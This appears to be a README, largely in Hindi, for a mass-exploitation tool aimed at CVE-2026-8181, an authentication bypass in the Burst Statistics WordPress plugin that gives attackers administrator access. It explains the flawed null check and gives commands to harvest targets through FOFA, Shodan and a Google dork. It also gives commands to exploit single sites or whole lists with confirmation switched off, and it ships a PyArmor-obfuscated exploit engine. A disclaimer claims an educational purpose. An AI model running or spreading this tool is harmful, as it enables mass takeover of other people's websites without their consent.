
CVE-2026-8181 — Burst Statistics WordPress plugin Authentication Bypass (CVSS 9.8) to Admin Account Takeover. Mass scanner with FOFA/Shodan integration and modern GUI.
CVSS 9.8 (गंभीर) — प्रमाणीकरण बाइपास से व्यवस्थापक खाता अधिग्रहण
CVE-2026-8181 Burst Statistics प्लगइन के संस्करण 3.4.0 से 3.4.1.1 में प्रमाणीकरण बाइपास (Authentication Bypass) भेद्यता है। यह प्लगइन 200,000+ WordPress साइटों द्वारा Google Analytics के गोपनीयता-अनुकूल विकल्प के रूप में उपयोग किया जाता है।
यह भेद्यता उन बिना प्रमाणीकरण वाले हमलावरों को अनुमति देती है जो व्यवस्थापक उपयोगकर्ता नाम जानते हैं:
class-mainwp-proxy.php में is_mainwp_authenticated() फ़ंक्शन wp_authenticate_application_password() के वापसी मान के सत्यापन में त्रुटि करता है। यह फ़ंक्शन REST API संदर्भ के बाहर कॉल किए जाने पर null ( WP_Error नहीं) लौटाता है, और कोड केवल is_wp_error() की जाँच करता है। चूंकि null WP_Error नहीं है, प्रमाणीकरण सफल माना जाता है।
# 1. Clone repository
git clone https://github.com/YOUR_USERNAME/CVE-2026-8181.git
cd CVE-2026-8181
# 2. Install dependencies
py -3.11 -m pip install -r requirements.txt
# 3. Siapkan .env (untuk scan via FOFA / Shodan)
echo [email protected] > .env
echo FOFA_KEY=your_fofa_key >> .env
echo SHODAN_KEY=your_shodan_key >> .env
# 4. Jalankan (pilih salah satu):
# Modern GUI (recommended)
py -3.11 gui_modern.py
# Atau double-click run.bat
run.bat
# Atau CLI langsung exploit satu target
py -3.11 CVE-2026-8181.py -t https://target.com -u admin --no-confirm
# Atau exploit massal dari file
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
# Atau scan target dulu, baru exploit
py -3.11 finder.py --file list.txt
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
run.bat पर डबल-क्लिक करें या चलाएँ:
py -3.11 gui_modern.py

3 टैब के साथ CVE-2026-8181 का आधुनिक GUI दृश्य
स्कैन टैब में: लक्ष्य स्रोत चुनें (.env से FOFA/Shodan, फ़ाइल, या मैन्युअल) → SCAN TARGETS पर क्लिक करें एक्सप्लॉइट टैब में: व्यवस्थापक उपयोगकर्ता नाम दर्ज करें → EXPLOIT पर क्लिक करें

उपकरण ने संवेदनशील लक्ष्य पाया और शोषण के लिए तैयार
यदि शोषण सफल होता है, तो हमलावर को व्यवस्थापक के रूप में पूर्ण पहुँच मिलती है:

सफल शोषण के बाद WordPress व्यवस्थापक डैशबोर्ड
CVE-2026-8181/
├── CVE-2026-8181.py # मुख्य शोषण इंजन (PyArmor)
├── gui_modern.py # आधुनिक GUI रैपर (अनुशंसित)
├── finder.py # लक्ष्य स्कैनर (FOFA / Shodan / फ़ाइल)
├── run.bat # एक-क्लिक लॉन्चर
├── requirements.txt # Python निर्भरताएँ
├── .env # API कुंजियाँ (gitignored)
├── .gitignore
├── Dork.txt # Google Dork
├── pyarmor_runtime_000000/ # PyArmor रनटाइम (Python 3.11)
├── system/ # स्रोत मॉड्यूल (अस्पष्ट)
└── img/ # स्क्रीनशॉट ट्यूटोरियल
├── 1.png
├── 2.png
└── 3.png
.env में डालें.env में डालेंकेवल शैक्षिक और अधिकृत पेनिट्रेशन परीक्षण उद्देश्यों के लिए। ऐसे सिस्टम पर बिना अनुमति के उपयोग जो आपके नहीं हैं, अवैध है। केवल उन साइटों पर उपयोग करें जो आपकी हैं या जिनके लिए आपके पास लिखित अनुमति है।
| Flag | विवरण |
|---|
-t, --target | लक्ष्य URL (एकल) |
-l, --list | लक्ष्यों की सूची वाली फ़ाइल |
-u, --username | व्यवस्थापक उपयोगकर्ता नाम (डिफ़ॉल्ट: admin) |
-T, --threads | थ्रेड की संख्या (डिफ़ॉल्ट: 10) |
-o, --output | परिणाम आउटपुट फ़ाइल |
-v, --verbose | डीबग आउटपुट |
--timeout | अनुरोध टाइमआउट (सेकंड) |
--no-confirm | पुष्टि छोड़ें |